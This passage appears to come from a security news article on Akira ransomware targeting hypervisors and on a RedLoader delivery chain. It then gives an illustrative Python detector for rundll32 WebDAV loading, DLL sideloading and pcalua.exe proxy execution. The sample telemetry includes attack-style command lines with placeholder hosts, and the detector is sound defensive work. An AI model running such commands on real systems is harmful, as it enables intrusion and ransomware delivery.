“The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tooling and custom binaries to facilitate a multi-stage malware delivery chain.” The disclosure comes as Huntress said it has noticed a huge spike in ransomware attacks on hypervisors, jumping from 3% in the first half of the year to 25% so far in the second half, primarily driven by the Akira group. “Ransomware operators deploy ransomware payloads directly through hypervisors, bypassing traditional endpoint protections entirely. In some instances, attackers leverage built-in tools such as OpenSSL to perform encryption of the virtual machine volumes, avoiding the need to upload custom ransomware binaries,” wrote researchers Anna Pham, Ben Bernstein, and Dray Agha. “This shift underscores a growing and uncomfortable trend: attackers are targeting the infrastructure that controls all hosts, and with access to the hypervisor, adversaries dramatically amplify the impact of their intrusion.” Given the heightened focus of threat actors on hypervisors, it’s advised to use local ESXi accounts, enforce multi-factor authentication (MFA), implement a strong password policy, segregate the hypervisor’s management network from production and general user networks, deploy a jump box to audit admin access, limit access to the control plane, and restrict ESXi management interface access to specific administrative devices.
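The July 2025 RedLoader delivery chain described above leaves three behaviors a defender can look for in endpoint telemetry: rundll32.exe reaching a WebDAV path, srvcli.dll or netutils.dll loaded from outside the Windows system directories, and pcalua.exe used to launch a payload. The following Python example is added here and is not code from Sophos or the original article; the event field names, the sample events and the check for pcalua.exe's `-a` switch are assumptions made for illustration.

```python
import re

# DLL names the article says RedLoader uses; genuine copies live in the system directories.
SIDELOAD_NAMES = {"srvcli.dll", "netutils.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Windows WebDAV UNC forms: \\host@SSL\..., \\host@8080\..., \\host\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+(@ssl|@\d+|\\davwwwroot)", re.I)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Return the names of the heuristic rules matched by one event (a dict)."""
    hits = []
    image = event.get("image", "")
    cmd = event.get("command_line", "")
    if event.get("type") == "process_create":
        if basename(image) == "rundll32.exe" and WEBDAV_UNC.search(cmd):
            hits.append("rundll32_webdav")
        # Assumption: pcalua.exe is given the program to run with its -a switch.
        if basename(image) == "pcalua.exe" and re.search(r"\s-a\s", cmd, re.I):
            hits.append("pcalua_proxy_exec")
    elif event.get("type") == "image_load":
        loaded = event.get("loaded", "").lower()
        if basename(loaded) in SIDELOAD_NAMES and not loaded.startswith(SYSTEM_DIRS):
            hits.append("dll_sideload")
    return hits


def detect(events):
    """Return (event_index, rule) pairs for every match, in input order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample telemetry (hosts, paths and entry names are placeholders).
EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe \\files.example.invalid@SSL\DavWWWRoot\cv\placeholder.dll,Placeholder"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "image_load", "image": r"C:\Users\hr\Downloads\ADNotificationManager.exe",
     "loaded": r"\\files.example.invalid@SSL\DavWWWRoot\cv\netutils.dll"},
    {"type": "image_load", "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\srvcli.dll"},
    {"type": "process_create", "image": r"C:\Windows\System32\pcalua.exe",
     "command_line": r"pcalua.exe -a C:\Users\Public\stage2-placeholder.exe"},
]

if __name__ == "__main__":
    for index, rule in detect(EVENTS):
        print(index, rule)
```

These rules are heuristics: each should be tuned against the environment's own baseline before alerting on it.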